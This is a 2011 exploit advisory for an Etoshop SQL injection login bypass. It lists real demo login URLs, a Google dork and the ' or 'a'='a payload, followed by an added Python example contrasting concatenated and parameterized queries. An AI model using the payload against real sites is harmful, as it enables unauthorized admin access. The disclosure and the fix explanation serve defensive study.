Etoshop suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: Etoshop(Auth Bypass) SQLi Vulnerability
# Vendor: http://www.etoshop.com
# Date: 12th July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork: ©2000 INNER ESTEEM SDN BHD
*****************************************************************************************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.etoshop.com/demo/pcstore/admin.asp
http://www.etoshop.com/demo/sbd-login.asp
http://www.etoshop.com/demo/cac-login.asp
http://www.etoshop.com/demo/csf-login.asp
EXPLOIT:
Username: ' or 'a'='a
Password: ' or 'a'='a
Observe: Attackers can use Authentication Bypass to get into the Admin
Panel, storebuilder, c2c auction, and classifieds in the site.
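
Why the input above passes a login check, and the fix, as an added example that is not from the advisory or from Etoshop's code. The query shape, table and column names are assumptions (the advisory does not show the application's source), and an in-memory SQLite database stands in for the application's database.

```python
import sqlite3

def make_db():
    # Constructed sample table; the real Etoshop schema is not shown in the advisory.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # Plaintext value only to keep the focus on the query; store password hashes in practice.
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret-constructed')")
    return db

def build_concatenated_sql(username, password):
    # Assumed vulnerable pattern: form input pasted directly into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    return ("SELECT COUNT(*) FROM admins WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_concatenated(db, username, password):
    return db.execute(build_concatenated_sql(username, password)).fetchone()[0] > 0

def login_parameterized(db, username, password):
    # Hardened form: placeholders send the input as bound values, never as SQL text,
    # so quotes in the input are compared literally against the stored columns.
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

if __name__ == "__main__":
    db = make_db()
    advisory_input = "' or 'a'='a"  # the value given in the advisory for both fields
    # The WHERE clause becomes: username = '' or 'a'='a' AND password = '' or 'a'='a'
    # AND binds tighter than OR, and the trailing "or 'a'='a'" is always true.
    print(build_concatenated_sql(advisory_input, advisory_input))
    print("concatenated :", login_concatenated(db, advisory_input, advisory_input))
    print("parameterized:", login_parameterized(db, advisory_input, advisory_input))
    print("valid login  :", login_parameterized(db, "admin", "s3cret-constructed"))
```
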
********************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
********************************************************************************************************************************************